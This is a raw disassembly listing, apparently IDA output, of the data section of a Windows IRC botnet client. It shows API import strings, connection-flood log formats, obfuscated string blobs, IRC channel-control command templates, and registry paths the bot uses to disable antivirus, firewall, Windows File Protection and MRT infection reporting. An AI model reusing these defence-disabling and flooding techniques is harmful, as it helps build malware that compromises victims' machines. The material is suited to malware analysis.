aRegdeletekeya db 'RegDeleteKeyA',0 ; DATA XREF: sub_41729C+2FB�o
align 4
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_41729C+2EE�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_41729C+2E1�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_41729C+2D4�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_41729C+2C7�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_41729C+2BF�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_41729C:loc_417546�o
align 4
aGetclassnamea db 'GetClassNameA',0 ; DATA XREF: sub_41729C+255�o
align 4
aIswindowvisibl db 'IsWindowVisible',0 ; DATA XREF: sub_41729C+248�o
aShowwindow db 'ShowWindow',0 ; DATA XREF: sub_41729C+23B�o
align 4
aGetwindowthrea db 'GetWindowThreadProcessId',0 ; DATA XREF: sub_41729C+22E�o
align 10h
aGetwindowinfo db 'GetWindowInfo',0 ; DATA XREF: sub_41729C+221�o
align 10h
aEnumwindows db 'EnumWindows',0 ; DATA XREF: sub_41729C:loc_4174B5�o
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_41729C+1B9�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_41729C+1AC�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_41729C+19F�o
align 10h
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_41729C+192�o
align 10h
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_41729C+185�o
align 10h
aIswindow db 'IsWindow',0 ; DATA XREF: sub_41729C+178�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_41729C+16B�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_41729C+15E�o
align 4
aClosewindow db 'CloseWindow',0 ; DATA XREF: sub_41729C+156�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_41729C:loc_4173DD�o
; sub_418D49+2F�o ...
align 10h
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_41729C:loc_4173B9�o
align 4
aGetcomputernam db 'GetComputerNameA',0 ; DATA XREF: sub_41729C+AD�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_41729C+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_41729C+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_41729C+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_41729C+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_41729C+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_41729C+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_41729C+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_41729C+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_41729C+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_41729C+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_41729C+23�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_41729C+A�o
align 4
aSSSSExecutingF db '%s %s %s: %s executing file: %s.',0 ; DATA XREF: sub_4181F4+695�o
align 4
aSProcessSSTota db '%s Process %s: "%s", Total %s Time: %s.',0 ; DATA XREF: sub_4181F4+55E�o
a_2d_2d db ' %.2d:%.2d',0 ; DATA XREF: sub_4181F4+53A�o
; sub_41F46D+2BA�o
align 4
aDS db ' %d%s',0 ; DATA XREF: sub_4181F4+50F�o
; sub_41F46D+292�o
align 4
aHours db ' hours',0 ; DATA XREF: sub_4181F4+502�o
; sub_41F46D+285�o
align 4
aHour db ' hour',0 ; DATA XREF: sub_4181F4+4FB�o
; sub_41F46D+27E�o
align 4
aSCreatedProces db '%s Created process: "%s", PID: <%d>',0 ; DATA XREF: sub_4181F4+470�o
; sub_4181F4+497�o
aSSToCreateProc db '%s %s to create process: "%s", %s: <%d>',0 ; DATA XREF: sub_4181F4+404�o
; sub_4181F4+435�o
aSCouldnTParseP db '%s Couldn',27h,'t parse path, %s: <%d>',0 ; DATA XREF: sub_4181F4+32D�o
; sub_4181F4+356�o
align 4
aSSS_1fkbToS@_1 db '%s %s %s: %.1fKB to: %s @ %.1fKB/sec.',0 ; DATA XREF: sub_4181F4+252�o
; sub_4181F4+2BA�o
align 4
aSCouldnTOpenFi db '%s Couldn',27h,'t open file for writing: %s.',0
; DATA XREF: sub_4181F4+AC�o
align 4
aSErrorOutOfMem db '%s Error: Out Of Mem!',0 ; DATA XREF: sub_418A0D+1B9�o
align 4
aSSSDSentDConnS db '%s %s (%s:%d) Sent: (%d) conn(s) for (%d) sec(s)',0
; DATA XREF: sub_418A0D+12B�o
align 10h
aSSendingSDDC_0 db '%s -> Sending (%s:%d) (%d) conn(s) for (%d) sec(s)',0
; DATA XREF: sub_418A0D+A0�o
align 4
aSSendingSDDCon db '%s -> Sending (%s:%d) (%d) connects(s) for (%d) sec(s)',0
; DATA XREF: sub_418A0D+73�o
align 10h
aGx000032 db 'gx000032',0 ; DATA XREF: sub_418EDB+C�o
align 4
a3c9 db ']&3c9',0 ; DATA XREF: sub_40A938+57C6�o
; sub_40A938+895D�o ...
word_443982 dw 1F99h ; DATA XREF: sub_4020AA:loc_402108�r
; sub_406C3A:loc_406C89�r ...
word_443984 dw 1704h ; DATA XREF: sub_40A938:loc_40C0C0�r
word_443986 dw 46Ah ; DATA XREF: .text:004018D8�r
; sub_403B6C+121�r ...
byte_443988 db 26h ; DATA XREF: sub_40A86F+2F�r
; sub_40A86F+83�r ...
align 4
dword_44398C dd 14h ; sub_422394+3C�r
dword_443990 dd 2477664Fh, 6AA83178h, 0C07559h ; sub_406C3A+79�o ...
dword_44399C dd 12727B5Bh, 0 ; sub_401B6E+132�o ...
dword_4439A4 dd 6333265Dh, 6ACE7A39h, 0C3230Fh ; sub_40A938+89B2�o ...
dword_4439B0 dd 296E616Dh, 64842364h, 57D66274h, 80F161D3h, 94724350h
; DATA XREF: sub_4051C0+114�o
; sub_4164D0+29F�o ...
dd 228F8170h, 0
dword_4439CC dd 296E616Dh, 64842364h, 57D66274h, 80F161D3h, 94724350h
; DATA XREF: sub_4164D0+2B7�o
; sub_42211B+59�o
dd 228F8170h, 0
; ---------------------------------------------------------------------------
loc_4439E8: ; DATA XREF: sub_4164D0+2D1�o
; sub_42211B:loc_4221AF�o
jg short loc_443A50
popa
das
xor [si+6B64h], eax
db 64h
retf
; ---------------------------------------------------------------------------
db 47h
db 0CFh, 36h, 0C1h
; ---------------------------------------------------------------------------
locret_4439F7: ; CODE XREF: .text:00443A4E�j
iret
; ---------------------------------------------------------------------------
dd 8F735876h, 3E85AE3Ch, 0BF819E04h, 6B45316Ch, 0E0012D37h
dd 40C62470h, 0DB3F5643h, 0CEBDA35Eh, 0D0C83555h, 8B38914h
dd 60318907h, 58EEE403h, 571696B2h, 8CDC5413h, 2 dup(0)
dword_443A38 dd 80000002h ; sub_427CE1+36�r
dword_443A3C dd 19464769h, 1A5155Ch, 4AE85160h ; sub_422394+B3�o ...
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
loc_443A49: ; CODE XREF: .text:00443A68�j
xor ebx, ebp
pushf
push ecx
push ecx
jz short locret_4439F7
loc_443A50: ; CODE XREF: .text:loc_4439E8�j
inc eax
mov edx, 83143E83h
cdq
mov al, ds:3E74085Ch
push ss
cmp dl, [esi]
clc
insd
adc esi, eax
sbb al, 10h
imul edi, [eax], -24h
jno short loc_443A49
pushf
fimul word ptr [ecx+0]
; ---------------------------------------------------------------------------
dw 0
dd 32h dup(0)
db 3 dup(0)
byte_443B3B db 6Dh ; DATA XREF: sub_4164D0+287�o
; sub_422394+AB�o ...
dd 64296E61h, 74648423h, 8057D662h, 4A81DD02h, 70976F45h
dd 9888h, 0BDh dup(0)
dword_443E48 dd 2B666B0Ch, 7CC0603Bh, 12C33909h, 0DDD12099h, 0C935565Fh
; DATA XREF: sub_4164D0+38�o
; sub_420399+229�o
dd 65898C7Dh, 0E0888E41h, 2A033261h, 0
dword_443E6C dd 7B376C5Fh, 7C94376Ah, 129C390Fh, 0D9822396h, 0CA64010Fh
; DATA XREF: sub_40A938+A47�o
; sub_4164D0+50�o
dd 64DFD57Dh, 0E388DA13h, 7A533061h, 0
dword_443E90 dd 7C333A1Bh, 76C67739h, 1B95340Fh, 0DF817391h, 0C9310F07h
; DATA XREF: sub_4155B9+1�o
; sub_4164D0+68�o ...
dd 61D9DD25h, 8DB0CA42h, 621F6126h, 0A4477B24h, 5BC9073Ah
dd 0D863310Bh, 9EFDB718h, 90946704h, 5DE38C55h, 217AC45Ch
dd 4FB3AC05h, 1E4ED4E9h, 88816F5Bh, 293525C0h, 7F7749h
off_443EE0 dd offset dword_445D3C ; DATA XREF: sub_420399+1D1�r
dd offset dword_445D34
dd offset dword_445D2C
dd offset dword_445D20
dd offset dword_445D14
dword_443EF4 dd 6D6519h ; sub_40A938+7C8�o ...
off_443EF8 dd offset loc_415B67+1 ; DATA XREF: sub_4164D0+C1�o
; sub_4209F2+52�o ...
dword_443EFC dd 356D6519h, 0 ; sub_40A938+1D3F�o ...
dword_443F04 dd 3E6D6519h, 0 ; sub_4164D0+121�o ...
dword_443F0C dd 266D6519h, 0 ; sub_40A938:loc_40BC2C�o ...
dword_443F14 dd 3E6D6519h, 2 dup(0) ; sub_420399:loc_420502�o ...
dword_443F20 dd 7D317059h ; sub_418EDB+607�r
dd 6A993566h, 47C0684Bh, 8C9C32CEh, 5A51h, 22h dup(0)
db 3 dup(0)
byte_443FBF db 49h ; DATA XREF: sub_4164D0+170�o
; sub_418EDB+5DA�o
dd 6E3F636Dh, 4F258720h, 7Eh, 0
dword_443FD0 dd 0CE9h ; sub_40A938+4FF�o ...
dword_443FD4 dd 0 dd 7C30705Ch, 77C6603Bh, 5ACD7A12h, 9DDD6FE9h, 59h, 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444099
; ---------------------------------------------------------------------------
align 10h
pop ebp
jno short near ptr byte_444101
and ah, [esi+35h]
cdq
push 4Bh
loc_444099: ; CODE XREF: .text:00444088�j
push 32CE47C0h
pushf
mov word ptr [ecx+5Ah], ss
; ---------------------------------------------------------------------------
dw 0
dd 17h dup(0)
db 0
byte_444101 db 3 dup(0) ; CODE XREF: .text:00444091�j
dd 0Ah dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444151
; ---------------------------------------------------------------------------
align 4
pop ebp
xor es:26D96439h, dh
push ebp
loc_444151: ; CODE XREF: .text:00444140�j
ja short $+2
; ---------------------------------------------------------------------------
db 0
dd 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444209
; ---------------------------------------------------------------------------
align 10h
dd 7D313859h, 27D96573h
; ---------------------------------------------------------------------------
push ebx
loc_444209: ; CODE XREF: .text:004441F8�j
and eax, esi
inc eax
; ---------------------------------------------------------------------------
dd 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_4442C1
; ---------------------------------------------------------------------------
align 4
dd 206D6759h, 27D9266Ch
; ---------------------------------------------------------------------------
push ebx
loc_4442C1: ; CODE XREF: .text:004442B0�j
and eax, esi
inc eax
; ---------------------------------------------------------------------------
dd 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444379
; ---------------------------------------------------------------------------
align 10h
dd 286C6D4Eh, 2A983C7Bh
; ---------------------------------------------------------------------------
pop ecx
loc_444379: ; CODE XREF: .text:00444368�j
and eax, ecx
inc edi
mov fs, word ptr [ebx]
ficomp word ptr [edx-6A96A4A5h]
jns short near ptr dword_4442C4+85h
mov large ds:0, dh
; ---------------------------------------------------------------------------
dd 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444431
; ---------------------------------------------------------------------------
align 4
dd 236F604Ah, 369E236Eh
; ---------------------------------------------------------------------------
pop ecx
loc_444431: ; CODE XREF: .text:00444420�j
and eax, ecx
inc edi
mov fs, word ptr [ebx]
ficomp word ptr [edx-6A96A4A5h]
jns short near ptr dword_44438C+75h
mov large ds:0, dh
; ---------------------------------------------------------------------------
dd 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_4444E9
; ---------------------------------------------------------------------------
align 10h
dd 236F604Ah, 2398386Eh
; ---------------------------------------------------------------------------
push ebp
loc_4444E9: ; CODE XREF: .text:004444D8�j
arpl [ebx-2F903BB9h], cx
or dword ptr [ebx+52h], 6Ch
xchg eax, edx
jb short near ptr dword_444444+3Ah
les esi, [edx]
adc eax, 0
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 1Fh dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_4445A1
; ---------------------------------------------------------------------------
align 4
dd 3E6F6E4Fh, 2194357Bh
db 12h
; ---------------------------------------------------------------------------
loc_4445A1: ; CODE XREF: .text:00444590�j
push 2FD74CD1h
rol ecx, 50h
push edx
jz short $+2
; ---------------------------------------------------------------------------
dd 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444659
; ---------------------------------------------------------------------------
align 10h
dd 2B65604Eh, 29822664h
; ---------------------------------------------------------------------------
dec edi
loc_444659: ; CODE XREF: .text:00444648�j
and eax, edi
inc ecx
shr dword ptr [eax], cl
fmul qword ptr [ebx-67D1B0A5h]
jnb short near ptr dword_4445AC+3Ah
; ---------------------------------------------------------------------------
dw 0
dd 21h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
; ---------------------------------------------------------------------------
jmp loc_444711
; ---------------------------------------------------------------------------
align 4
dd 7D317059h, 6A993566h
; ---------------------------------------------------------------------------
dec ebx
loc_444711: ; CODE XREF: .text:00444700�j
push 32CE47C0h
pushf
mov word ptr [ecx+5Ah], ss
; ---------------------------------------------------------------------------
dw 0
dd 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 7C30705Ch, 77C6603Bh, 5ACD7A12h, 9DDD6FE9h, 59h, 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
aQnF5sjkhG2Mqz db ']qn"f5™jKhÀGÎ2œŒQZ',0
align 4
dd 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 3530265Dh, 26D96439h, 7755h, 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 7D313859h, 27D96573h, 40C62353h, 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 206D6759h, 27D9266Ch, 40C62353h, 24h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
aNmlSYGoIxyI5 db 'Nml({<˜*Y#ÁGŽ#Þš[[i•yÈ5',0
align 4
dd 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
aJONU6yGoIxyI5 db 'J`o#n#ž6Y#ÁGŽ#Þš[[i•yÈ5',0
align 4
dd 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 236F604Ah, 2398386Eh, 478B6355h, 83D06FC4h, 926C524Bh
dd 32C48872h, 15h, 20h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dd 3E6F6E4Fh, 2194357Bh, 4CD16812h, 0C1C12FD7h, 745250h
dd 22h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
aNEDVOALO_ssa db 'N`e+d&‚)O#ÇAÓ(Ü‹[O.˜s€',0
align 10h
dd 21h dup(0)
dd 49000000h, 6E3F636Dh, 4F258720h, 7Eh, 0
dd 0CECh, 0
dword_444EF0 dd 80000002h ; sub_418EDB+56�r ...
dword_444EF4 dd 19464769h, 1A5155Ch, 4AE85160h, 9CDD33C3h, 0A7745151h
; DATA XREF: sub_4164D0+1B0�o
; sub_418D49+149�o ...
dd 3E83BA40h, 0A0998314h, 3E74085Ch, 0F8163A16h, 1CC6116Dh
dd 0DC386B10h, 0C39DDF71h, 93CD2F42h, 0CA4D134h, 7B379407h
dd 0F54Dh, 2Fh dup(0)
db 3 dup(0)
byte_444FF3 db 57h ; DATA XREF: sub_4164D0+1C7�o
; sub_418D49+144�o ...
dd 6522677Bh, 31h, 0C1h dup(0)
dword_445300 dd 80000002h ; sub_41BB45+AB�r ...
dword_445304 dd 19464769h, 1A5155Ch, 4AE85160h, 9CDD33C3h, 0A7745151h
; DATA XREF: sub_4164D0+1DF�o
; sub_41BB45+89�o ...
dd 3E83BA40h, 0A0998314h, 3E74085Ch, 0F8163A16h, 1CC6116Dh
dd 0DC386B10h, 0C39DDF71h, 93CD2F42h, 0CA4D134h, 7B379407h
dd 0F54Dh, 2Fh dup(0)
db 3 dup(0)
byte_445403 db 48h ; DATA XREF: sub_4164D0+1F7�o
; sub_41BB45+83�o ...
dd 3D756Dh, 0C2h dup(0)
dword_445710 dd 80000002h ; sub_427AFB+89�r ...
dword_445714 dd 19464769h, 1A5155Ch, 4AE85160h, 9CDD33C3h, 0A7745151h
; DATA XREF: sub_4164D0+20F�o
; sub_427AFB+13�o ...
dd 3E83BA40h, 0A0998314h, 3E74085Ch, 0F8163A16h, 1CC6116Dh
dd 0DC386B10h, 0C39DDF71h, 93CD2F42h, 0CA4D134h, 7B379407h
dd 0F54Dh, 2Fh dup(0)
db 3 dup(0)
byte_445813 db 53h ; DATA XREF: sub_4164D0+227�o
; sub_427AFB+C�o ...
dd 66247466h, 31h, 0C1h dup(0)
dword_445B20 dd 32314B77h, 425A3046h, 2F616C70h, 0 ; sub_420CC8+C�o
dword_445B30 dd 4D787073h, 2F472F72h, 30494276h, 0 ; sub_41CAFB+187�o
dword_445B40 dd 526E322Fh, 704B2E75h, 2F784E4Bh, 0 ; sub_41CAFB+1A5�o
a7lybp1gunfm0 db '7LybP1GuNfm0',0 ; DATA XREF: sub_4155B9+27�o
; sub_41C7EB+184�o
align 10h
a391myLxl28_ db '391mY/LxL28.',0 ; DATA XREF: sub_4155B9+32�o
; sub_41C7EB+1AC�o
align 10h
a5h5br_qpSm1 db '5H5BR.qp/sm1',0 ; DATA XREF: sub_4155B9+3D�o
; sub_41CAFB+82�o ...
align 10h
aYjmlc1btsf10_0 db 'yJmlc1btsF10',0 ; DATA XREF: sub_4155B9+48�o
; sub_41CAFB+94�o ...
align 10h
aZyvgp1mxobt0_0 db 'zyVGp1MxObt0',0 ; DATA XREF: sub_4155B9+53�o
; sub_41CAFB:loc_41CC00�o ...
align 10h
aG7IvGks9l1_0 db 'g7/IV/gks9L1',0 ; DATA XREF: sub_4155B9+61�o
; sub_41CAFB+DF�o ...
align 10h
aTugnf_mqsdr0_0 db 'TuGNF.mQSDR0',0 ; DATA XREF: sub_4155B9+6C�o
; sub_41C7EB+198�o ...
align 10h
aBwIj0rhpgj1 db 'bw/Ij0rhPgj1',0 ; DATA XREF: sub_4155B9+77�o
; sub_420CC8+2E�o
align 10h
aFuv1h_fi8sc db 'FuV1H.fi8SC/',0 ; DATA XREF: sub_4155B9+82�o
; sub_420CC8+42�o
align 10h
aLcxMHdpwr1 db 'lCX/m/HdpWr1',0 ; DATA XREF: sub_4155B9+8D�o
; sub_41D04A+1A�o ...
align 10h
aVozbg0sssom1 db 'vozbG0sSsoM1',0 ; DATA XREF: sub_4155B9+98�o
; sub_41C9EE+3C�o ...
align 10h
aKc4l5_savs3_ db 'KC4L5.sAVS3.',0 ; DATA XREF: sub_4155B9+A3�o
; sub_41CE5F+F�o ...
align 10h
aWk12f0zbpla db 'wK12F0ZBpla/',0 ; DATA XREF: sub_4155B9+AE�o
align 10h
aSpxmrGVbi0 db 'spxMr/G/vBI0',0 ; DATA XREF: sub_4155B9+BC�o
; sub_42630C+54�o
align 10h
a2nru_kpknx db '/2nRu.KpKNx/',0 ; DATA XREF: sub_4155B9+C7�o
; sub_42630C+60�o
align 10h
a7lybp1gunfm0_0 db '7LybP1GuNfm0',0 ; DATA XREF: sub_4155B9+D2�o
; sub_426402+93�o
align 10h
a391myLxl28__0 db '391mY/LxL28.',0 ; DATA XREF: sub_4155B9+DD�o
; sub_426402+F0�o
align 10h
a5h5br_qpSm1_0 db '5H5BR.qp/sm1',0 ; DATA XREF: sub_40A938+36C8�o
; sub_40A938+36F3�o ...
align 10h
aYjmlc1btsf10 db 'yJmlc1btsF10',0 ; DATA XREF: sub_40A938+320F�o
; sub_40A938+372F�o ...
align 10h
aZyvgp1mxobt0 db 'zyVGp1MxObt0',0 ; DATA XREF: sub_40A938+2C79�o
; sub_40A938+2F18�o ...
align 10h
aG7IvGks9l1 db 'g7/IV/gks9L1',0 ; DATA XREF: sub_40A938+307E�o
; sub_40A938+31B5�o ...
align 10h
aTugnf_mqsdr0 db 'TuGNF.mQSDR0',0 ; DATA XREF: sub_40A938+31E8�o
; sub_40A938+37DF�o ...
align 10h
aBwIj0rhpgj1_0 db 'bw/Ij0rhPgj1',0 ; DATA XREF: sub_4155B9+122�o
align 10h
aFuv1h_fi8sc_0 db 'FuV1H.fi8SC/',0 ; DATA XREF: sub_4155B9+12D�o
align 10h
aLcxMHdpwr1_0 db 'lCX/m/HdpWr1',0 ; DATA XREF: sub_40A938+364D�o
; sub_4155B9+138�o
align 10h
aVozbg0sssom1_0 db 'vozbG0sSsoM1',0 ; DATA XREF: sub_4155B9+143�o
align 10h
aKc4l5_savs3__0 db 'KC4L5.sAVS3.',0 ; DATA XREF: sub_4155B9+14E�o
align 10h
dword_445D00 dd 16h ; sub_40A938+53E�r ...
dword_445D04 dd 5 ; sub_420399+1BE�r ...
dword_445D08 dd 10h dd offset byte_454A34
dd offset byte_454A34
dword_445D14 dd 0D2A2910h, 6AC77A3Bh, 0Chdword_445D20 dd 0D2A2910h, 6AC17A3Dh, 0Ahdword_445D2C dd 0D2A2910h, 3Bhdword_445D34 dd 0D2A2910h, 897E75hdword_445D3C dd 0D2A2910h, 32967A21h, 0dword_445D48 dd 255C7325h, 73h ; sub_420399+3D3�o ...
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_418D49+2A�o
; sub_434CA0+24�o
aSoftwarePoli_0 db 'SOFTWARE\Policies\Microsoft\MRT',0 ; DATA XREF: sub_418EDB+527�o
aDontreportinfe db 'DontReportInfectionInformation',0 ; DATA XREF: sub_418EDB+522�o
align 4
aFirewalloverri db 'FirewallOverride',0 ; DATA XREF: sub_418EDB+511�o
align 10h
aFirewalldisabl db 'FirewallDisableNotify',0 ; DATA XREF: sub_418EDB+500�o
align 4
aAntivirusoverr db 'AntiVirusOverride',0 ; DATA XREF: sub_418EDB+4EC�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Security Center',0 ; DATA XREF: sub_418EDB+4E0�o
; sub_418EDB+4F1�o ...
align 10h
aAntivirusdisab db 'AntiVirusDisableNotify',0 ; DATA XREF: sub_418EDB+4DB�o
align 4
aSystemContro_0 db 'SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPol'
; DATA XREF: sub_418EDB+4AA�o
; sub_418EDB+4BE�o ...
db 'icy\DomainProfile',0
align 4
aDisablenotific db 'DisableNotifications',0 ; DATA XREF: sub_418EDB+494�o
; sub_418EDB+4CA�o
align 4
aDonotallowexce db 'DoNotAllowExceptions',0 ; DATA XREF: sub_418EDB+483�o
; sub_418EDB+4B9�o
align 10h
aSystemControls db 'SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPol'
; DATA XREF: sub_418EDB+477�o
; sub_418EDB+488�o ...
db 'icy\StandardProfile',0
align 4
aEnablefirewall db 'EnableFirewall',0 ; DATA XREF: sub_418EDB+472�o
; sub_418EDB+4A5�o
align 4
aSystemCurren_3 db 'SYSTEM\CurrentControlSet\Services\NetBT\Parameters',0
; DATA XREF: sub_418EDB+463�o
align 4
aTransportbindn db 'TransportBindName',0 ; DATA XREF: sub_418EDB+45E�o
align 10h
aDevice db '\Device\',0 ; DATA XREF: sub_418EDB+459�o
align 4
aAutosharewks db 'AutoShareWks',0 ; DATA XREF: sub_418EDB+448�o
align 4
aAutoshareserve db 'AutoShareServer',0 ; DATA XREF: sub_418EDB+437�o
aSfcscan db 'SFCScan',0 ; DATA XREF: sub_418EDB+426�o
aSoftwarePolici db 'Software\Policies\Microsoft\Windows NT\Windows File Protection',0
; DATA XREF: sub_418EDB+417�o
; sub_418EDB+42B�o
align 4
aSfcdisable db 'SFCDisable',0 ; DATA XREF: sub_418EDB+412�o
align 10h
aSystemCurren_2 db 'SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters',0
; DATA XREF: sub_418EDB+405�o
; sub_418EDB+43C�o ...
align 4
aSizreqbuf db 'SizReqBuf',0 ; DATA XREF: sub_418EDB+400�o
align 4
aMaxconnectio_0 db 'MaxConnectionsPerServer',0 ; DATA XREF: sub_418EDB+3E7�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
; DATA XREF: sub_418EDB+3D3�o
; sub_418EDB+3EC�o
aMaxconnections db 'MaxConnectionsPer1_0Server',0 ; DATA XREF: sub_418EDB+3CE�o
align 4
aSystemCurren_1 db 'SYSTEM\CurrentControlSet\Services\Afd\Parameters',0
; DATA XREF: sub_418EDB+3BB�o
align 4
aDisablerawsecu db 'DisableRawSecurity',0 ; DATA XREF: sub_418EDB+3B6�o
align 10h
aTcpnumconnecti db 'TcpNumConnections',0 ; DATA XREF: sub_418EDB+3A9�o
; sub_418EDB+553�o
align 4
aAllowuserrawac db 'AllowUserRawAccess',0 ; DATA XREF: sub_418EDB+398�o
align 4
aLargebuffersiz db 'LargeBufferSize',0 ; DATA XREF: sub_418EDB+38B�o
aTcpmaxdupacks db 'TcpMaxDupAcks',0 ; DATA XREF: sub_418EDB+377�o
align 4
aDefaultttl db 'DefaultTTL',0 ; DATA XREF: sub_418EDB+369�o
align 4
aSackopts db 'SackOpts',0 ; DATA XREF: sub_418EDB+35B�o
align 10h
aEnablepmtubhde db 'EnablePMTUBHDetect',0 ; DATA XREF: sub_418EDB+34E�o
align 4
aEnablepmtudisc db 'EnablePMTUDiscovery',0 ; DATA XREF: sub_418EDB+33E�o
aTcpwindowsize db 'TcpWindowSize',0 ; DATA XREF: sub_418EDB+331�o
align 4
aGlobalmaxtcpwi db 'GlobalMaxTcpWindowSize',0 ; DATA XREF: sub_418EDB+320�o
align 10h
aTcp1323opts db 'Tcp1323Opts',0 ; DATA XREF: sub_418EDB+30F�o
aStricttimewait db 'StrictTimeWaitSeqCheck',0 ; DATA XREF: sub_418EDB+2FF�o
align 4
aTcptimedwaitde db 'TcpTimedWaitDelay',0 ; DATA XREF: sub_418EDB+2F2�o
align 4
aMaxuserport db 'MaxUserPort',0 ; DATA XREF: sub_418EDB+2E4�o
aSystemCurren_0 db 'SYSTEM\CurrentControlSet\Services\Tcpip\Parameters',0
; DATA XREF: sub_418EDB+2DF�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control',0 ; DATA XREF: sub_418EDB+2CF�o
align 4
aWaittokillserv db 'WaitToKillServiceT',0 ; DATA XREF: sub_418EDB+2C5�o
align 10h
a5000 db '5000',0 ; DATA XREF: sub_418EDB+2C0�o
align 4
aBan db 'ban',0 ; DATA XREF: sub_418EDB+2B5�o
aRModeChanB1 db 'r MODE $chan +b $1',0 ; DATA XREF: sub_418EDB+2B0�o
align 10h
aHalfop db 'halfop',0 ; DATA XREF: sub_418EDB+2A3�o
align 4
aRModeChanH1 db 'r MODE $chan +h $1',0 ; DATA XREF: sub_418EDB+29E�o
align 4
aVoice db 'voice',0 ; DATA XREF: sub_418EDB+294�o
align 4
aRModeChanV1 db 'r MODE $chan +v $1',0 ; DATA XREF: sub_418EDB+28F�o
align 4
aOps db 'ops',0 ; DATA XREF: sub_418EDB+285�o
aRModeChanO1 db 'r MODE $chan +o $1',0 ; DATA XREF: sub_418EDB+280�o
align 10h
aCtc2 db 'ctc2',0 ; DATA XREF: sub_418EDB+276�o
align 4
aR1_ db 'r $1 :.',0 ; DATA XREF: sub_418EDB+271�o
off_4462B0 dd offset byte_637463 ; DATA XREF: sub_418EDB+267�o
aRPrivmsg1_ db 'r PRIVMSG $1 :.',0 ; DATA XREF: sub_418EDB+262�o
aSlap db 'slap',0 ; DATA XREF: sub_418EDB+258�o
align 4
aRPrivmsg1Slaps db 'r PRIVMSG $1 slaps for You!!',0 ; DATA XREF: sub_418EDB+253�o
align 4
aSlaps db 'slaps',0 ; DATA XREF: sub_418EDB+249�o
align 4
aRPrivmsg1GodDa db 'r PRIVMSG $1 god damnit,hard bitchslaps for you!!',0
; DATA XREF: sub_418EDB+244�o
align 4
